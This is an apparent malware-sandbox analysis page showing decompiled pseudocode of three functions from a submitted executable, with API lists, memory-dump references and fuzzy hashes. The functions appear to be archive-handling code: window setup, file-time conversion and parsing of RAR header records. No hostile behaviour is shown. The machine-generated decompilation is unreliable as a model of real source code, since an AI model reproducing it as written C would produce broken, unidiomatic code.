                Function 003E9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E003E9ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E003E9C04(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L003F3E2E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E003F7625(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E003F7625(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0x433108(0,  *0x433154(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0x433110( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0x433118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x433154(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0x43310c( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E003E9CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L003F3E2E(_t67);
							}
						}
					}
				}
				return _t44;
			}















                0x003e9ede
                0x003e9ee2
                0x003e9ee8
                0x003e9eeb
                0x003e9eee
                0x003e9efa
                0x003e9f03
                0x003e9f08
                0x003e9f0d
                0x003e9f13
                0x003e9f19
                0x003e9f1d
                0x003e9f15
                0x003e9f15
                0x003e9f15
                0x003e9f28
                0x003e9f2b
                0x003e9f31
                0x003e9f35
                0x003e9f2d
                0x003e9f2d
                0x003e9f2d
                0x003e9f3b
                0x003e9f44
                0x003e9f5b
                0x003e9f65
                0x003e9f6a
                0x003e9f6a
                0x003e9f70
                0x003e9f7e
                0x003e9fab
                0x003e9fb1
                0x003e9fb8
                0x003e9ff2
                0x003e9ff4
                0x003e9ff9
                0x00000000
                0x003ea002
                0x003e9fba
                0x003e9fbc
                0x003e9fc3
                0x003e9fc6
                0x003e9fcd
                0x003e9fd2
                0x003e9fd6
                0x003e9fdb
                0x003e9fe3
                0x00000000
                0x003e9fef
                0x003e9fd6
                0x003e9fc6
                0x003e9fbc
                0x003ea00e

                APIs
                • ShowWindow.USER32(?,00000000), ref: 003E9EEE
                • GetWindowRect.USER32(?,00000000), ref: 003E9F44
                • ShowWindow.USER32(?,00000005,00000000), ref: 003E9FDB
                • SetWindowTextW.USER32(?,00000000), ref: 003E9FE3
                • ShowWindow.USER32(00000000,00000005), ref: 003E9FF9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: >$RarHtmlClassName
                • API String ID: 3937224194-3994152025
                • Opcode ID: 7c8d76e3b861e632b88041fbb7d2852b4d82a92bb9c77c750ae598cdd2d19f9a
                • Instruction ID: b23e45d8eabe77e674c1ad4ac79ed3205b5e9b1b8004a2c4e7c6ddce76e8eb59
                • Opcode Fuzzy Hash: 7c8d76e3b861e632b88041fbb7d2852b4d82a92bb9c77c750ae598cdd2d19f9a
                • Instruction Fuzzy Hash: 82410432004364EFDB229F66DC48B2B7BA8FF48702F004629F94999196CB74ED05CF65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E003E1218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				intOrPtr* _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				signed int _t78;
				long _t82;
				signed int _t87;
				signed int _t92;
				void* _t93;
				long _t94;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int* _t99;
				void* _t100;
				signed int _t101;

				_t100 = __ebp;
				_t94 = __edx;
				_t97 = __ecx;
				_v68 = __ecx;
				_v80 = E003EF1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76.dwLowDateTime = _t94;
				if(E003DB146() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v76);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v76);
				}
				_push(_t100);
				FileTimeToSystemTime( &_v76,  &_v48);
				_t99 = _a4;
				_t92 = _v48.wDay & 0x0000ffff;
				_t101 = _v48.wMonth & 0x0000ffff;
				_t95 = _v48.wYear & 0x0000ffff;
				_t99[3] = _v48.wHour & 0x0000ffff;
				_t87 = _t92 - 1;
				_t99[4] = _v48.wMinute & 0x0000ffff;
				_t99[5] = _v48.wSecond & 0x0000ffff;
				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t99 = _v48.wYear & 0x0000ffff;
				_t99[1] = _t101;
				_t99[2] = _t92;
				_t99[8] = _t87;
				_v76.dwLowDateTime = 1;
				if(_t101 > 1) {
					_t96 = _t87;
					_t98 = 0x40e1a8;
					_t93 = 4;
					while(1) {
						_t87 = _t96;
						if(_t93 > 0x30) {
							break;
						}
						_t93 = _t93 + 4;
						_t87 =  *_t98 + _t96;
						_t82 = _v76.dwLowDateTime + 1;
						_t99[8] = _t87;
						_t98 = _t98 + 4;
						_v76.dwLowDateTime = _t82;
						_t96 = _t87;
						if(_t82 < _t101) {
							continue;
						}
						break;
					}
					_t97 = _v68;
					_t95 = _v48.wYear & 0x0000ffff;
				}
				if(_t101 > 2 && E003E13A4(_t95) != 0) {
					_t99[8] = _t87 + 1;
				}
				_t78 = E003EF250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
				_t99[6] = _t78;
				return _t78;
			}























                0x003e1218
                0x003e1218
                0x003e121e
                0x003e1225
                0x003e1233
                0x003e1237
                0x003e1245
                0x003e1263
                0x003e1274
                0x003e1284
                0x003e1294
                0x003e12a6
                0x003e12ae
                0x003e12b4
                0x003e12ba
                0x003e12be
                0x003e12c0
                0x003e1247
                0x003e1251
                0x003e1251
                0x003e12c4
                0x003e12cf
                0x003e12d5
                0x003e12de
                0x003e12e3
                0x003e12e8
                0x003e12ed
                0x003e12f5
                0x003e12f8
                0x003e1300
                0x003e1308
                0x003e130e
                0x003e1310
                0x003e1313
                0x003e1316
                0x003e1319
                0x003e131f
                0x003e1323
                0x003e1325
                0x003e132a
                0x003e132b
                0x003e132b
                0x003e1330
                0x00000000
                0x00000000
                0x003e1334
                0x003e133b
                0x003e133d
                0x003e133e
                0x003e1341
                0x003e1344
                0x003e1348
                0x003e134c
                0x00000000
                0x00000000
                0x00000000
                0x003e134c
                0x003e134e
                0x003e1352
                0x003e1352
                0x003e135b
                0x003e136a
                0x003e136a
                0x003e1379
                0x003e137f
                0x003e1387

                APIs
                • __aulldiv.LIBCMT ref: 003E122E
                  • Part of subcall function 003DB146: GetVersionExW.KERNEL32(?), ref: 003DB16B
                • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 003E1251
                • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 003E1263
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 003E1274
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1284
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1294
                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003E12CF
                • __aullrem.LIBCMT ref: 003E1379
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: a5838706641af98234e9a57afcbb718cb37d31943a8eb1fcff58e0f9d287d741
                • Instruction ID: 55803608700551c370742e3469c61a967b2fc2a9a7579f438389225e75687b0e
                • Opcode Fuzzy Hash: a5838706641af98234e9a57afcbb718cb37d31943a8eb1fcff58e0f9d287d741
                • Instruction Fuzzy Hash: 1E4146B6408355AFC710DF65C88096BBBF9FF88315F008A2EF596C6250E738E609CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E003D2210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
				char _v4;
				signed char _v5;
				char _v12;
				char _v16;
				signed char _t135;
				char _t138;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t165;
				signed int _t176;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed char _t221;
				signed char _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr _t240;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				signed char _t263;
				signed int _t264;
				signed int _t266;
				intOrPtr _t273;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t306;
				intOrPtr _t311;
				signed int _t313;
				intOrPtr _t315;
				signed char _t318;
				char _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				intOrPtr* _t334;
				signed int _t337;
				signed int _t338;
				intOrPtr _t340;
				void* _t341;
				signed int _t345;
				signed int _t348;
				signed int _t361;

				_t313 = __edx;
				E003EEC50(0x20ac);
				_t315 = _a8368;
				_a12 = __ecx;
				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
				if(_t135 <  *(_t315 + 0x1c)) {
					L96:
					return _t135;
				}
				 *(_t315 + 0x1c) = _t135;
				if(_a8372 >= 2) {
					_t240 = _a8376;
					while(1) {
						_t135 = E003DCCFB();
						_t244 = _t135;
						_t345 = _t313;
						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
							break;
						}
						_t318 =  *(_t315 + 0x1c);
						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
						if(_t135 == 0) {
							break;
						}
						_t348 = _t313;
						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
							break;
						} else {
							_a8 = _t318 + _t244;
							_t138 = E003DCCFB();
							_t337 = _t313;
							_t319 = _t138;
							_t313 = _a8;
							_t247 = _t313 -  *(_t315 + 0x1c);
							_a20 = _t247;
							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
								 *((char*)(_t240 + 0x1e)) = _t138;
								_t234 = E003DCCFB();
								_a16 = _t234;
								if((_t234 & 0x00000001) != 0) {
									_t237 = E003DCCFB();
									if((_t237 | _t313) != 0) {
										_t311 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
									}
									_t234 = _a16;
								}
								if((_t234 & 0x00000002) != 0) {
									_t235 = E003DCCFB();
									if((_t235 | _t313) != 0) {
										_t306 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
									}
								}
								_t247 = _a20;
								_t313 = _a8;
							}
							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
								_t361 = _t337;
								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
									goto L94;
								} else {
									_t320 = _t319 - 1;
									if(_t320 == 0) {
										_t140 = E003DCCFB();
										__eflags = _t140;
										if(_t140 == 0) {
											_t141 = E003DCCFB();
											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E003DCBAF(_t315) & 0x000000ff;
											 *(_t240 + 0x10ec) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												E003D4092( &_a28, 0x14, L"xc%u", _t145);
												_t341 = _t341 + 0x10;
												E003D403D(_a12, _t240 + 0x28,  &_a28);
											}
											E003DCC5D(_t315, _t240 + 0x10a1, 0x10);
											E003DCC5D(_t315, _t240 + 0x10b1, 0x10);
											__eflags =  *(_t240 + 0x10c1);
											if( *(_t240 + 0x10c1) != 0) {
												_t321 = _t240 + 0x10c2;
												E003DCC5D(_t315, _t321, 8);
												E003DCC5D(_t315,  &_a16, 4);
												E003E0016( &_a52);
												_push(8);
												_push(_t321);
												_push( &_a48);
												E003E005C();
												_push( &_v4);
												E003DFF33( &_a36);
												_t162 = E003F0C4A( &_v16,  &_v12, 4);
												_t341 = _t341 + 0xc;
												asm("sbb al, al");
												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
												 *(_t240 + 0x10c1) =  ~_t162 + 1;
												if( *((intOrPtr*)(_t240 + 4)) == 3) {
													_t165 = E003F0C4A(_t321, 0x4036a8, 8);
													_t341 = _t341 + 0xc;
													__eflags = _t165;
													if(_t165 == 0) {
														 *(_t240 + 0x10c1) = _t165;
													}
												}
											}
											 *((char*)(_t240 + 0x10a0)) = 1;
											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
											 *((char*)(_t240 + 0x109b)) = 1;
										} else {
											E003D4092( &_a28, 0x14, L"x%u", _t140);
											_t341 = _t341 + 0x10;
											E003D403D(_a12, _t240 + 0x28,  &_a28);
										}
										goto L94;
									}
									_t322 = _t320 - 1;
									if(_t322 == 0) {
										_t176 = E003DCCFB();
										__eflags = _t176;
										if(_t176 != 0) {
											goto L94;
										}
										_push(0x20);
										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
										_push(_t240 + 0x1074);
										L37:
										E003DCC5D(_t315);
										goto L94;
									}
									_t323 = _t322 - 1;
									if(_t323 == 0) {
										__eflags = _t247 - 5;
										if(_t247 < 5) {
											goto L94;
										}
										_t179 = E003DCCFB();
										_a3 = _t179;
										_t180 = _t179 & 0x00000001;
										_t263 = _a3;
										_a4 = _t180;
										_t313 = _t263 & 0x00000002;
										__eflags = _t313;
										_a5 = _t313;
										if(_t313 != 0) {
											_t279 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E003E15BB(_t240 + 0x1040, E003DCC3D(_t279, __eflags), _t313);
											} else {
												E003E158F(_t240 + 0x1040, E003DCBFB(_t279), 0);
											}
											_t263 = _a3;
											_t180 = _a4;
										}
										_t264 = _t263 & 0x00000004;
										__eflags = _t264;
										_a6 = _t264;
										if(_t264 != 0) {
											_t326 = _t240 + 0x1048;
											_t276 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E003E15BB(_t326, E003DCC3D(_t276, __eflags), _t313);
											} else {
												E003E158F(_t326, E003DCBFB(_t276), 0);
											}
										}
										_t181 = _a3;
										_t266 = _t181 & 0x00000008;
										__eflags = _t266;
										_a7 = _t266;
										if(_t266 == 0) {
											__eflags = _a4;
											if(_a4 == 0) {
												goto L94;
											}
											goto L72;
										} else {
											__eflags = _a4;
											_t325 = _t240 + 0x1050;
											_t273 = _t315;
											if(__eflags == 0) {
												E003E15BB(_t325, E003DCC3D(_t273, __eflags), _t313);
												goto L94;
											}
											E003E158F(_t325, E003DCBFB(_t273), 0);
											_t181 = _v5;
											L72:
											__eflags = _t181 & 0x00000010;
											if((_t181 & 0x00000010) != 0) {
												__eflags = _a5;
												if(_a5 == 0) {
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
												} else {
													_t188 = E003DCBFB(_t315);
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
													_t189 = _t188 & 0x3fffffff;
													__eflags = _t189 - 0x3b9aca00;
													if(_t189 < 0x3b9aca00) {
														E003E1208(_t240 + 0x1040, _t189, 0);
													}
												}
												__eflags = _a6;
												if(_a6 != 0) {
													_t186 = E003DCBFB(_t315) & _t338;
													__eflags = _t186 - _t324;
													if(_t186 < _t324) {
														E003E1208(_t240 + 0x1048, _t186, 0);
													}
												}
												__eflags = _a7;
												if(_a7 != 0) {
													_t183 = E003DCBFB(_t315) & _t338;
													__eflags = _t183 - _t324;
													if(_t183 < _t324) {
														E003E1208(_t240 + 0x1050, _t183, 0);
													}
												}
											}
											goto L94;
										}
									}
									_t327 = _t323 - 1;
									if(_t327 == 0) {
										__eflags = _t247 - 1;
										if(_t247 >= 1) {
											E003DCCFB();
											__eflags = E003DCCFB();
											if(__eflags != 0) {
												 *((char*)(_t240 + 0x10f3)) = 1;
												E003D4092( &_a28, 0x14, L";%u", _t204);
												_t341 = _t341 + 0x10;
												E003E05DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
											}
										}
										goto L94;
									}
									_t328 = _t327 - 1;
									if(_t328 == 0) {
										 *((intOrPtr*)(_t240 + 0x1100)) = E003DCCFB();
										 *(_t240 + 0x2104) = E003DCCFB() & 0x00000001;
										_t329 = E003DCCFB();
										_a172 = 0;
										__eflags = _t329 - 0x1fff;
										if(_t329 < 0x1fff) {
											E003DCC5D(_t315,  &_a172, _t329);
											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
										}
										E003DC335( &_a172,  &_a172, 0x2000);
										_push(0x800);
										_push(_t240 + 0x1104);
										_push( &_a160);
										E003E1C3B();
										goto L94;
									}
									_t330 = _t328 - 1;
									if(_t330 == 0) {
										_t221 = E003DCCFB();
										_a16 = _t221;
										_t339 = _t240 + 0x2108;
										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
										 *((char*)(_t240 + 0x2208)) = 0;
										 *((char*)(_t240 + 0x2108)) = 0;
										__eflags = _t221 & 0x00000001;
										if((_t221 & 0x00000001) != 0) {
											_t332 = E003DCCFB();
											__eflags = _t332 - 0xff;
											if(_t332 >= 0xff) {
												_t332 = 0xff;
											}
											E003DCC5D(_t315, _t339, _t332);
											_t221 = _a8;
											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
										}
										__eflags = _t221 & 0x00000002;
										if((_t221 & 0x00000002) != 0) {
											_t331 = E003DCCFB();
											__eflags = _t331 - 0xff;
											if(_t331 >= 0xff) {
												_t331 = 0xff;
											}
											E003DCC5D(_t315, _t240 + 0x2208, _t331);
											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
										}
										__eflags =  *(_t240 + 0x2106);
										if( *(_t240 + 0x2106) != 0) {
											 *((intOrPtr*)(_t240 + 0x2308)) = E003DCCFB();
										}
										__eflags =  *(_t240 + 0x2107);
										if( *(_t240 + 0x2107) != 0) {
											 *((intOrPtr*)(_t240 + 0x230c)) = E003DCCFB();
										}
										 *((char*)(_t240 + 0x2105)) = 1;
										goto L94;
									}
									if(_t330 != 1) {
										goto L94;
									}
									_t340 = _t247;
									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
										_t340 = _t247 + 1;
									}
									_t334 = _t240 + 0x1028;
									E003D20BD(_t334, _t340);
									_push(_t340);
									_push( *_t334);
									goto L37;
								}
							} else {
								L94:
								_t248 = _a8;
								 *(_t315 + 0x1c) = _t248;
								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
								if(_t135 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}































































                0x003d2210
                0x003d2215
                0x003d221b
                0x003d2222
                0x003d2229
                0x003d2233
                0x003d2862
                0x003d2868
                0x003d2868
                0x003d2241
                0x003d2244
                0x003d224b
                0x003d2254
                0x003d2256
                0x003d225b
                0x003d225d
                0x003d225f
                0x00000000
                0x00000000
                0x003d2272
                0x003d2275
                0x003d2277
                0x00000000
                0x00000000
                0x003d227d
                0x003d227f
                0x00000000
                0x003d228f
                0x003d2294
                0x003d2298
                0x003d229d
                0x003d229f
                0x003d22a1
                0x003d22a7
                0x003d22ae
                0x003d22b2
                0x003d22bf
                0x003d22c2
                0x003d22c7
                0x003d22cd
                0x003d22d1
                0x003d22da
                0x003d22dc
                0x003d22ec
                0x003d22ee
                0x003d22f1
                0x003d22f1
                0x003d22f4
                0x003d22f4
                0x003d22fa
                0x003d22fe
                0x003d2307
                0x003d2309
                0x003d2319
                0x003d231b
                0x003d231e
                0x003d231e
                0x003d2307
                0x003d2321
                0x003d2325
                0x003d2325
                0x003d232d
                0x003d2339
                0x003d233b
                0x00000000
                0x003d234c
                0x003d234c
                0x003d234f
                0x003d26f3
                0x003d26f8
                0x003d26fa
                0x003d272a
                0x003d2738
                0x003d2740
                0x003d274b
                0x003d274e
                0x003d2754
                0x003d2757
                0x003d2766
                0x003d2773
                0x003d277b
                0x003d277b
                0x003d278b
                0x003d279b
                0x003d27a0
                0x003d27a7
                0x003d27af
                0x003d27b8
                0x003d27c6
                0x003d27d0
                0x003d27d5
                0x003d27d7
                0x003d27dc
                0x003d27dd
                0x003d27e6
                0x003d27ec
                0x003d27fd
                0x003d2802
                0x003d2807
                0x003d280b
                0x003d280f
                0x003d2815
                0x003d281f
                0x003d2824
                0x003d2827
                0x003d2829
                0x003d282b
                0x003d282b
                0x003d2829
                0x003d2815
                0x003d2831
                0x003d2838
                0x003d2842
                0x003d26fc
                0x003d2709
                0x003d2716
                0x003d271e
                0x003d271e
                0x00000000
                0x003d26fa
                0x003d2355
                0x003d2358
                0x003d26cc
                0x003d26d1
                0x003d26d3
                0x00000000
                0x00000000
                0x003d26d9
                0x003d26e1
                0x003d26eb
                0x003d23ad
                0x003d23af
                0x00000000
                0x003d23af
                0x003d235e
                0x003d2361
                0x003d2556
                0x003d2559
                0x00000000
                0x00000000
                0x003d2561
                0x003d2566
                0x003d256a
                0x003d256c
                0x003d2572
                0x003d2576
                0x003d2576
                0x003d2579
                0x003d257d
                0x003d257f
                0x003d2581
                0x003d2583
                0x003d25a7
                0x003d2585
                0x003d2593
                0x003d2593
                0x003d25ac
                0x003d25b0
                0x003d25b0
                0x003d25b4
                0x003d25b4
                0x003d25b7
                0x003d25bb
                0x003d25bd
                0x003d25c3
                0x003d25c5
                0x003d25c7
                0x003d25e3
                0x003d25c9
                0x003d25d3
                0x003d25d3
                0x003d25c7
                0x003d25e8
                0x003d25ee
                0x003d25ee
                0x003d25f1
                0x003d25f5
                0x003d262e
                0x003d2633
                0x00000000
                0x00000000
                0x00000000
                0x003d25f7
                0x003d25f7
                0x003d25fc
                0x003d2602
                0x003d2604
                0x003d2624
                0x00000000
                0x003d2624
                0x003d2610
                0x003d2615
                0x003d2639
                0x003d2639
                0x003d263b
                0x003d2641
                0x003d2646
                0x003d266f
                0x003d2674
                0x003d2648
                0x003d264a
                0x003d264f
                0x003d2654
                0x003d2659
                0x003d265b
                0x003d265d
                0x003d2668
                0x003d2668
                0x003d265d
                0x003d2679
                0x003d267e
                0x003d2687
                0x003d2689
                0x003d268b
                0x003d2696
                0x003d2696
                0x003d268b
                0x003d269b
                0x003d26a0
                0x003d26ad
                0x003d26af
                0x003d26b1
                0x003d26c0
                0x003d26c0
                0x003d26b1
                0x003d26a0
                0x00000000
                0x003d263b
                0x003d25f5
                0x003d2367
                0x003d236a
                0x003d2503
                0x003d2506
                0x003d250e
                0x003d251a
                0x003d251c
                0x003d252c
                0x003d2536
                0x003d253b
                0x003d254c
                0x003d254c
                0x003d251c
                0x00000000
                0x003d2506
                0x003d2370
                0x003d2373
                0x003d248e
                0x003d249d
                0x003d24a8
                0x003d24aa
                0x003d24b2
                0x003d24b8
                0x003d24c5
                0x003d24ca
                0x003d24ca
                0x003d24e0
                0x003d24e5
                0x003d24f0
                0x003d24f8
                0x003d24f9
                0x00000000
                0x003d24f9
                0x003d2379
                0x003d237c
                0x003d23bb
                0x003d23c2
                0x003d23c9
                0x003d23d2
                0x003d23e0
                0x003d23e6
                0x003d23ed
                0x003d23f1
                0x003d23f3
                0x003d23fc
                0x003d2403
                0x003d2405
                0x003d2407
                0x003d2407
                0x003d240d
                0x003d2412
                0x003d2416
                0x003d2416
                0x003d241e
                0x003d2420
                0x003d2429
                0x003d2430
                0x003d2432
                0x003d2434
                0x003d2434
                0x003d2440
                0x003d2445
                0x003d2445
                0x003d244d
                0x003d2454
                0x003d245d
                0x003d245d
                0x003d2463
                0x003d246a
                0x003d2473
                0x003d2473
                0x003d2479
                0x00000000
                0x003d2479
                0x003d2381
                0x00000000
                0x00000000
                0x003d238b
                0x003d238d
                0x003d2399
                0x003d2399
                0x003d239c
                0x003d23a5
                0x003d23aa
                0x003d23ab
                0x00000000
                0x003d23ab
                0x003d2849
                0x003d2849
                0x003d2849
                0x003d284d
                0x003d2853
                0x003d2858
                0x00000000
                0x00000000
                0x00000000
                0x003d2858
                0x003d232d
                0x003d227f
                0x003d2860

                APIs
                • _swprintf.LIBCMT ref: 003D2536
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __vswprintf_c_l_swprintf_wcslen
                • String ID: ;%u$x%u$xc%u
                • API String ID: 3053425827-2277559157
                • Opcode ID: fb1865f790fa67e6ff07cfcb19b2833da606a1c16c39bac1a46f6f25667e6fae
